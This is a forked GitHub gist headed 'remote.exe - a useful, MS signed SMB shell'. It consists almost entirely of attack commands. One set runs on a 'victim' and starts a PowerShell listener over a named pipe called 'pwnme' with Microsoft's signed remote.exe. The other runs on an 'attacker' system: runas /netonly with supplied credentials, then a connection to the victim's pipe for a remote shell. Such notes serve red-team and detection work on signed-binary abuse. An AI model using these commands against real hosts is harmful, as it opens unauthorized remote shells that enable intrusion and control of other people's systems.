Forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
Created
January 23, 2017 07:26
-
-
Save yashodhank/98e6dc5132be7013f27064b4723498a9 to your computer and use it in GitHub Desktop.
remote.exe - a useful, MS signed SMB shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment